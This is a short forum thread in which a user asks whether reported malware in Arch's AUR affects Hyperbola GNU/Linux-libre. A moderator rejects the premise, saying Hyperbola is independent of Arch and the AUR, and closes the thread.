1 Topic by Ribby (edited by Ribby 2025-08-03 06:23:48)

  • Ribby
  • Guest

Topic: Arch Linux's "AUR" OS repository have malware

According to the Linux news, the Arch Linux OS repository have recent user-defined uploads as malware. Sources state that Arch doesn't vet the uploads so its OS repository relies on community activity. Some say that more malware was uploaded after clearing the first malware batch.

For Arch users, I assume that a degree of diligence is required when it comes to installing programs. I assume that practice is verification before compiling the source code. A straight software installation from the OS repository is a blind check. The server have some questionable protocols that might as well jeopardize Arch into Windows or iPod Apple store.

I know that Hyperbola GNU/Linux-libre is regarded as a different OS from Arch Linux, but I can't shake the feeling that it uses some of its design. Can anyone ensure that a vetting process is in effect for any file uploads/edits in the Hyperbola OS repository? Furthermore, if Hyperbola does derive from Arch, does that mean there is a risk to unknowingly extract malware as a base for software on other Arch-like OS? If Hyperbola does indeed find itself at risk from derivation, it is a understandable move to develop HyperbolaBSD. And what about the Arch users, where should they go? I hope that they look forward to Hyperbola (while I can't vouch for encryption options, I can attest that Windows XP on a 32bit machine would be on a similar encryption level), but I suppose Parabola would suffice for their taste.
As they say, it is nigh time to abandon ship, the Arch ship, that is.

Cited references:
https://www.bleepingcomputer.com/news/s … t-malware/

2 Reply by throgh

  • throgh
  • throgh
  • Package Development and Community Coordinator
  • Offline
  • From: Planet Earth
  • Registered: 2017-12-28
  • Posts: 3,049

Re: Arch Linux's "AUR" OS repository have malware

I close this thread now as you have created a presumed connection being totally wrong: First and foremost Hyperbola does not include any kind of malware taken from the AUR. You have demonstrated also now that you have not read complete the current problem and issue: Anyone can create own packaging-scripts. This is true for every system-distribution, may it be Ubuntu with its PPA-repositories driven by users (and also part of possible malware in the past with included warnings), Debian with DEB-packages created elsewhere and ready for download, Fedora with user-driven repositories outside, Slackware, Gentoo and therefore also Arch GNU/Linux.

You are now creating a mistreating and clearly wrong connection: HyperbolaBSD was not created out of a possible derivation. Hyperbola is complete independent developed, only using pacman. We have no connection to the AUR and we advise every user / developer to look on the packaging-script. If they do not want to do this, we cannot help out and we are surely also not willing to do so.

Please read next time the source you are using, to quote:

We strongly encourage users that may have installed one of these packages to remove them from their system and to take the necessary measures in order to ensure they were not compromised

This is written directly within that article as quote from the AUR-administration. And we are talking foremost here about so-called binary packages, created from upstream binary distributed data and tarballs. Did you have even had a look how packages here are created? That users are doing their own packages while Hyperbola is doing direct different also? We do not even share any connection with the AUR and our infrastructure is also complete different to build. Creating a thread based on an impression and feeling is the wrong way and you were told not to act upon those basics several times within debates. Ask before doing something on assumptions: We are not Arch-based. Besides that your current statements towards Arch GNU/Linux are also wrong.

Thread closed!

Human being in favor with clear principles and so also for freedom in soft- and hardware!

Certainly anyone who has the power to make you believe absurdities has the power to make you commit injustices: For a life of every being full with peace and kindness, including diversity and freedom. Capitalism is destroying our minds, the planet itself and the universe in the end!